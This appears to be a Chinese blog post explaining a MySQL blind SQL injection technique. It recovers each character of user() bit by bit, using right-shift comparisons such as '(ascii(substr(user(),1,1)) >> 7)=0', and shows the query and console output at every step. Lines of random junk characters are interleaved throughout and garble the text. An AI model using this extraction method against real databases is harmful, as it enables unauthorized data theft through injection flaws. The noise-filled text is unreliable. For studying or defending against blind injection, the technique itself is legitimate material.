关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位


! O- A3 m' X0 f; U+ [
& j* E' J9 ~7 K6 D+ d! R0 U0 }8 c下面将以查询mysql数据库当中user()的第一位为例:

) B% B( C0 z% E3 ]0 r+ V& r

. E' F. W1 t3 t3 k8 a+ ops:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
) V& _$ X! i0 b1 ~
3 ]4 T; _4 f$ O$ k+ X
' ~! v. T; Z9 y, @+ D* A  Y
首先执行如下sql语句:



( R9 v/ N4 m% J) C0 b* ]mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
9 s+ G1 g% a& d# y4 a, ]0 i8 p
. }. u& V7 P' v& L2 \

2 v: Y. A; ?& y) h! W& k9 `4 s我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

4 M8 D* Z+ e6 j

第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
! z  S# T& U! P


: D9 k% l% x# `- S3 H+ b如果运算结果为1,说明第一位为0,不为1
- t6 M" y2 e6 r% E; O; g+ F


+————————————–+
1 l/ r. b4 J4 y/ c9 m8 G
| (ascii((substr(user(),1,1))) >> 7)=0 |
: `% C3 s2 t  a5 }
6 V3 b  j0 a7 O' `$ M$ o! P2 j; Z+————————————–+
+ B# R' m2 K" p$ I7 h
: T3 _2 O& m1 A| 1 |
( I6 ?. `- Q; J2 P  C+ \2 y
+————————————–+
9 n6 d: ~) }8 H1 {$ _9 a& _
* y) n* t: f& B/ _5 W! p# K1 row in set (0.00 sec)
8 [1 Z' \& D' z$ s: v1 i$ N- n( u5 G( ]
$ j% d! F+ i' [! \( {3 M这样我们就确定这个8bit的ascii的第一位为0

; [- k& c' g! W+ m8 O# o4 V
0 V+ \1 i  q) h) n: A
第二次我们来做6次右偏移来确定前两位
4 c; J. k1 I; C4 T, }" `$ x

' D1 U( ^7 M& w; R) A& n* i: ?
# r: X( a' z/ k+ U; j前两位可能是01或00,即依然可以与0做比较,
/ |7 i8 ^7 w9 ^: W" N& t
mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+

| (ascii((substr(user(),1,1))) >> 6)=0 |
* G( A, ^- W3 J) w
  m8 O# H. J1 k' ?# X8 z& }+————————————–+

+ Z7 l0 H" W& C6 m| 0 |
4 h# [4 ~' p6 {& y) ?( S7 v
1 T) p" V; E2 w, \, q+————————————–+
: T4 W3 U$ ^4 y$ G# {
1 row in set (0.00 sec)


2 S$ [% k, D0 x& e( A  s
结果为0,即第二位为1

7 G% ^+ k6 s" V3 u+ K

0 A6 [2 W; P( R  d; h' b1 r开始猜测前三位为010或011
" Z% j$ X2 ?  J) I) c8 l
" C* N1 Z9 o2 R) z. R- p- o

让我们看看010和011的ascii码是多少
6 T$ c! y; `9 l& u4 H0 M1 T
' B: D; y2 {8 @, V! I: ~* V

- C0 N7 ?# F6 a8 o$ f5 @6 W( m分别查询select b’011′ select b’010′

' P& \/ B% |/ N5 [4 R

7 U* t* r! N" E0 q获得结果 010 = 2 011 = 3

4 F3 I8 \; w! o; ^) f/ r" ]

执行如下sql:



mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
: b- z8 ~% c! ~0 }' O
+————————————–+
9 K( l  l1 D- R' X. Z6 u& d
| (ascii((substr(user(),1,1))) >> 5)=2 |

+————————————–+

| 0 |
: J( c5 r$ _9 T$ C5 {0 O
+————————————–+
) s9 C9 }5 C4 `/ P* z2 l
即前三位不为010,而是011
9 U8 u9 l& ^3 C6 L
1 M! r8 ?8 [& L7 s* t/ N
: ^& h" B1 E7 N, \( ^9 K
直到获得最后一位

6 k' m( R+ n5 c+ f
( x( G! }7 t9 ]. E
最终结果为:01110010
0 L! V2 n& V2 [4 p9 J% Y
( [$ q0 _9 i6 {9 H" T0 C/ i2 L

转换一下:

) t' j5 U- B, o

, W7 A( D3 E1 B& o) kselect b’01110010′


7 Q7 o; i# T" p( g
) z* _+ s6 R! i2 f查询结果

: F, n( ]% ]0 _) [  d8 z% K& m1 M

+ R$ U2 t* P( f) ~  n: \& o/ r+————-+
0 C, Z4 p: N% @% ?
| b’01110010′ |

+————-+
- O' ]" R8 u6 i% l' N
| r |
3 v0 S- Q3 g  ^& @8 L
+————-+

% k) J* z0 b6 _% ]% Q% }1 row in set (0.00 sec)
: f* T# Z" m2 ^7 F: j' k0 {2 c; ?

! @! M7 n/ S) A' l
这样我们就获得了user()的第一位.其它位依此类推
8 h1 @' [, r; l  L0 b
% j: m1 Y- J% j" B